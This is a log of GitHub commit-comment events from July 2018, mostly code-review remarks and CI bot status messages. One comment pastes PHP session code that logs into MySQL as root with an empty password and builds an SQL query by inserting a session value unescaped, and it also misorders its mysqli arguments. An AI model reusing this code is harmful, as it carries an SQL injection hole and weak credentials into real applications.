{"id":"8014795262","type":"CommitCommentEvent","actor":{"login":"ehrenfeu"},"repo":{"name":"imcf/auto-tx"},"payload":{"comment":{"id":29825295,"position":null,"line":null,"path":null,"commit_id":"38865b6f1a2551a23b5034fde6dd808475e053fb","created_at":"2018-07-25T07:56:17Z","updated_at":"2018-07-25T07:56:17Z","author_association":"MEMBER","body":"Relates to #3 "}},"created_at":"2018-07-25T07:56:17Z"}
{"id":"8014795861","type":"CommitCommentEvent","actor":{"login":"ehrenfeu"},"repo":{"name":"imcf/auto-tx"},"payload":{"comment":{"id":29825299,"position":null,"line":null,"path":null,"commit_id":"31cebdc2489c53540e425da85ad4639f7fbdf95d","created_at":"2018-07-25T07:56:25Z","updated_at":"2018-07-25T07:56:25Z","author_association":"MEMBER","body":"Relates to #3 "}},"created_at":"2018-07-25T07:56:25Z"}
{"id":"8014796871","type":"CommitCommentEvent","actor":{"login":"ayende"},"repo":{"name":"topalach/docs"},"payload":{"comment":{"id":29825303,"position":1,"line":1,"path":"Articles/Raven.Documentation.Articles/articles/ravendb-point-of-sale-raspberry-pi-acid.markdown","commit_id":"82e875364d495d52536f2da70e6f1c75b8c1fb6c","created_at":"2018-07-25T07:56:37Z","updated_at":"2018-07-25T07:56:37Z","author_association":"NONE","body":"Fix the author"}},"created_at":"2018-07-25T07:56:37Z"}
{"id":"8014797204","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29825304,"position":null,"line":null,"path":null,"commit_id":"22780214c34f0b9f38807a41d6edab562367a176","created_at":"2018-07-25T07:56:41Z","updated_at":"2018-07-25T07:56:41Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-313](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-313).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-313-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-25T07:56:41Z"}
{"id":"8014798172","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825307,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-25T07:56:54Z","updated_at":"2018-07-25T07:56:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T07:56:54Z"}
{"id":"8014798634","type":"CommitCommentEvent","actor":{"login":"ayende"},"repo":{"name":"topalach/docs"},"payload":{"comment":{"id":29825309,"position":37,"line":37,"path":"Articles/Raven.Documentation.Articles/articles/ravendb-point-of-sale-raspberry-pi-acid.markdown","commit_id":"82e875364d495d52536f2da70e6f1c75b8c1fb6c","created_at":"2018-07-25T07:56:59Z","updated_at":"2018-07-25T07:56:59Z","author_association":"NONE","body":"billions of customers, not millions"}},"created_at":"2018-07-25T07:56:59Z"}
{"id":"8014800930","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825317,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-25T07:57:26Z","updated_at":"2018-07-25T07:57:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T07:57:26Z"}
{"id":"8014803977","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825325,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-25T07:58:07Z","updated_at":"2018-07-25T07:58:07Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T07:58:07Z"}
{"id":"8014805702","type":"CommitCommentEvent","actor":{"login":"AlbertSnow"},"repo":{"name":"burgessjp/GetWordTextView"},"payload":{"comment":{"id":29825327,"position":null,"line":null,"path":null,"commit_id":"9e00ca2da0c73d743fce198c9de57a494b3cd9a1","created_at":"2018-07-25T07:58:30Z","updated_at":"2018-07-25T07:58:30Z","author_association":"NONE","body":"1.fix crash bug   2.use compatible view component"}},"created_at":"2018-07-25T07:58:30Z"}
{"id":"8014806368","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825329,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-25T07:58:38Z","updated_at":"2018-07-25T07:58:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T07:58:38Z"}
{"id":"8014809641","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825341,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-25T07:59:19Z","updated_at":"2018-07-25T07:59:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T07:59:19Z"}
{"id":"8014811964","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825351,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-25T07:59:50Z","updated_at":"2018-07-25T07:59:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T07:59:50Z"}
{"id":"8014812926","type":"CommitCommentEvent","actor":{"login":"sungkuk5420"},"repo":{"name":"sungkuk5420/CarRepairShopApp"},"payload":{"comment":{"id":29825353,"position":107,"line":90,"path":"views/login_footer.ejs","commit_id":"5c7fd19780e63954d3a5d34de987ad081dcfa5d1","created_at":"2018-07-25T08:00:02Z","updated_at":"2018-07-25T08:00:02Z","author_association":"OWNER","body":"리뷰테스트"}},"created_at":"2018-07-25T08:00:02Z"}
{"id":"8014815508","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825371,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-25T08:00:32Z","updated_at":"2018-07-25T08:00:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:00:32Z"}
{"id":"8014816942","type":"CommitCommentEvent","actor":{"login":"geoblo"},"repo":{"name":"geoblo/fingertrip"},"payload":{"comment":{"id":29825374,"position":14,"line":35,"path":"fingertrip/src/main/java/com/ff/finger/cs/controller/BoardController.java","commit_id":"8ccdf2a558eb87e06645d8b8866311109b899e50","created_at":"2018-07-25T08:00:49Z","updated_at":"2018-07-25T08:00:49Z","author_association":"OWNER","body":"boardNo에 대한 (defaultValue=\"0\") 설정이 빠졌습니다. 넣어주세요^^"}},"created_at":"2018-07-25T08:00:49Z"}
{"id":"8014817904","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825376,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-25T08:01:01Z","updated_at":"2018-07-25T08:01:01Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:01:01Z"}
{"id":"8014818870","type":"CommitCommentEvent","actor":{"login":"zhouhuanirving"},"repo":{"name":"zhouhuanirving/demo1"},"payload":{"comment":{"id":29825379,"position":null,"line":null,"path":null,"commit_id":"bf70a8b0d60dfa275b2d7a1c4c36919f7a183395","created_at":"2018-07-25T08:01:13Z","updated_at":"2018-07-25T08:01:13Z","author_association":"OWNER","body":"sadfdsaf"}},"created_at":"2018-07-25T08:01:13Z"}
{"id":"8014820618","type":"CommitCommentEvent","actor":{"login":"thatvictor7"},"repo":{"name":"thatvictor7/wdi-precourse-drills"},"payload":{"comment":{"id":29825383,"position":null,"line":null,"path":null,"commit_id":"b5dbaf751fa8e05e54438757cb9e7a0e4fb48743","created_at":"2018-07-25T08:01:34Z","updated_at":"2018-07-25T08:01:34Z","author_association":"OWNER","body":"Added 2 columns and set them up next to each other through the css file."}},"created_at":"2018-07-25T08:01:34Z"}
{"id":"8014823615","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825385,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-25T08:02:15Z","updated_at":"2018-07-25T08:02:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:02:15Z"}
{"id":"8014824763","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29825388,"position":null,"line":null,"path":null,"commit_id":"13a757210913853dae7c4a1cbbadff149d399f23","created_at":"2018-07-25T08:02:29Z","updated_at":"2018-07-25T08:02:29Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/2044/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 21698 seconds\n\nTests produced 2792 warnings. 2792 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-25T08:02:29Z"}
{"id":"8014827165","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825391,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-25T08:02:59Z","updated_at":"2018-07-25T08:02:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:02:59Z"}
{"id":"8014829368","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825396,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-25T08:03:28Z","updated_at":"2018-07-25T08:03:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:03:28Z"}
{"id":"8014829714","type":"CommitCommentEvent","actor":{"login":"xxinb"},"repo":{"name":"xxinb/meet_app"},"payload":{"comment":{"id":29825398,"position":null,"line":null,"path":null,"commit_id":"dcbae1ad08e9c01b333a5a25b85904733a1e3ada","created_at":"2018-07-25T08:03:32Z","updated_at":"2018-07-25T08:03:32Z","author_association":"OWNER","body":"skdfjaowekfdjs"}},"created_at":"2018-07-25T08:03:32Z"}
{"id":"8014830713","type":"CommitCommentEvent","actor":{"login":"n-t-roff"},"repo":{"name":"n-t-roff/heirloom"},"payload":{"comment":{"id":29825400,"position":51,"line":51,"path":"doctools.html","commit_id":"53e435f5f139b6f750bb79d2e0cd0a8ffb36265e","created_at":"2018-07-25T08:03:46Z","updated_at":"2018-07-25T08:03:46Z","author_association":"OWNER","body":"I think Gunnar tried to highlight the text with this element. I'll change it to `<em>` etc."}},"created_at":"2018-07-25T08:03:46Z"}
{"id":"8014832128","type":"CommitCommentEvent","actor":{"login":"JingL1014"},"repo":{"name":"openeventdata/UniversalPetrarch"},"payload":{"comment":{"id":29825405,"position":null,"line":null,"path":null,"commit_id":"413996e72d9800c6f81bb06188222e701fc10474","created_at":"2018-07-25T08:04:04Z","updated_at":"2018-07-25T08:04:04Z","author_association":"COLLABORATOR","body":"#41 "}},"created_at":"2018-07-25T08:04:04Z"}
{"id":"8014832904","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825406,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-25T08:04:13Z","updated_at":"2018-07-25T08:04:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:04:13Z"}
{"id":"8014834923","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825409,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-25T08:04:39Z","updated_at":"2018-07-25T08:04:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:04:39Z"}
{"id":"8014835822","type":"CommitCommentEvent","actor":{"login":"GitTest1Acc"},"repo":{"name":"GitTest1Acc/TestRepoPublic"},"payload":{"comment":{"id":29825410,"position":null,"line":null,"path":null,"commit_id":"bc4471383062d2b21e426e539a9ce245d254db4b","created_at":"2018-07-25T08:04:49Z","updated_at":"2018-07-25T08:04:49Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://109.195.189.78:40102/ui#review:id=4)"}},"created_at":"2018-07-25T08:04:49Z"}
{"id":"8014837345","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29825412,"position":10,"line":10,"path":"1/ideal_weight.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-25T08:05:09Z","updated_at":"2018-07-25T08:05:09Z","author_association":"NONE","body":"- Переменная может использоваться несколько раз в файле, и если каждый раз приводить тип, то это будет каждый раз считаться.\r\n- Когда мы видим переменную height при чтении кода, мы интуитивно рассчитываем, что там будет цифра, а не строка. Мы хотим по возможности избегать контр-интуитивных вещей, так-как в коде и так будет хватать сложности.\r\n- Легко забыть привести тип при подставлении вычислений и из-за динамической природы руби мы поймаем баг в рантайме только когда это вычисление будет осуществлено. При чем это может быть через месяцы в продакшене."}},"created_at":"2018-07-25T08:05:09Z"}
{"id":"8014838700","type":"CommitCommentEvent","actor":{"login":"samwilson"},"repo":{"name":"xbgmsharp/piwigo-openstreetmap"},"payload":{"comment":{"id":29825413,"position":null,"line":null,"path":null,"commit_id":"92c3a06d0f2236df16c0d4ac9c4bc5935d1be9a7","created_at":"2018-07-25T08:05:26Z","updated_at":"2018-07-25T08:05:26Z","author_association":"NONE","body":"This also needs to be changed in maintain.inc.php; see #156."}},"created_at":"2018-07-25T08:05:26Z"}
{"id":"8014838754","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825414,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-25T08:05:27Z","updated_at":"2018-07-25T08:05:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:05:27Z"}
{"id":"8014840814","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29825417,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-25T08:05:54Z","updated_at":"2018-07-25T08:05:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T08:05:54Z"}
{"id":"8014841652","type":"CommitCommentEvent","actor":{"login":"Floessie"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":29825419,"position":81,"line":341,"path":"rtengine/iplab2rgb.cc","commit_id":"b06e07034e6a99cba225ec449c52327c1c5c25eb","created_at":"2018-07-25T08:06:05Z","updated_at":"2018-07-25T08:06:05Z","author_association":"COLLABORATOR","body":"Hm, technically `sizeof(wchar_t)` and UTF-16/32 are apples and oranges: The former is the internal representation of the Unicode codepoint, the latter it's external encoding. Hopefully this code does, what it's supposed to..."}},"created_at":"2018-07-25T08:06:05Z"}
{"id":"8014841957","type":"CommitCommentEvent","actor":{"login":"EdwinVanRooij"},"repo":{"name":"O2MC/dimml-mobile-sdk"},"payload":{"comment":{"id":29825420,"position":null,"line":null,"path":null,"commit_id":"cfdf3c9ed0ad5af5b37193fe2ba00051eaa30923","created_at":"2018-07-25T08:06:09Z","updated_at":"2018-07-25T08:06:09Z","author_association":"CONTRIBUTOR","body":"Will the anonymous mode result in a `null` value, or will the entire field be left out in the response?\r\nCurrently, the second is the case for Android (like we discussed yesterday). Let's discuss this with our back-end colleagues soon."}},"created_at":"2018-07-25T08:06:09Z"}
{"id":"8014842122","type":"CommitCommentEvent","actor":{"login":"repository"},"repo":{"name":"umanking/spring-jpa-example"},"payload":{"comment":{"id":29825421,"position":null,"line":null,"path":null,"commit_id":"9b6894cb4070997198baf09b0ff07d8cd5aee2d3","created_at":"2018-07-25T08:06:11Z","updated_at":"2018-07-25T08:06:11Z","author_association":"NONE","body":"@umanking having this username is so fun."}},"created_at":"2018-07-25T08:06:11Z"}
{"id":"8014843029","type":"CommitCommentEvent","actor":{"login":"azdeveloping"},"repo":{"name":"TheMathewNorman/RFID-Group-14"},"payload":{"comment":{"id":29825424,"position":18,"line":18,"path":"Portal/php/sessions.php","commit_id":"9df9f18f1d417e87666d756f0ad913d6da84cddb","created_at":"2018-07-25T08:06:23Z","updated_at":"2018-07-25T08:06:23Z","author_association":"COLLABORATOR","body":"`<?php\r\n// Establishing Connection with Server by passing server_name, user_id and password as a parameter\r\n$connection = mysqli_connect(\"localhost\", \"root\", \"\");\r\n// Selecting Database\r\n$db = mysqli_select_db(\"therfidmen\", $connection);\r\nsession_start();// Starting Session\r\n// Storing Session\r\n$user_check=$_SESSION['login_user'];\r\n// SQL Query To Fetch Complete Information Of User\r\n$ses_sql=mysqli_query(\"select username from login where username='$user_check'\", $connection);\r\n$row = mysqli_fetch_assoc($ses_sql);\r\n$login_session =$row['username'];\r\nif(!isset($login_session)){\r\nmysqli_close($connection); // Closing Connection\r\nheader('Location: index.php'); // Redirecting To Home Page\r\n}\r\n?>`"}},"created_at":"2018-07-25T08:06:23Z"}
{"id":"8014843503","type":"CommitCommentEvent","actor":{"login":"tomhanika"},"repo":{"name":"Kama93/conexp-clj"},"payload":{"comment":{"id":29825425,"position":null,"line":null,"path":null,"commit_id":"5851d5ddaaa9b370e71451a51159fe8a68cf794e","created_at":"2018-07-25T08:06:29Z","updated_at":"2018-07-25T08:06:29Z","author_association":"NONE","body":"Maybe, rename those into contxt-k-cores ;) "}},"created_at":"2018-07-25T08:06:29Z"}
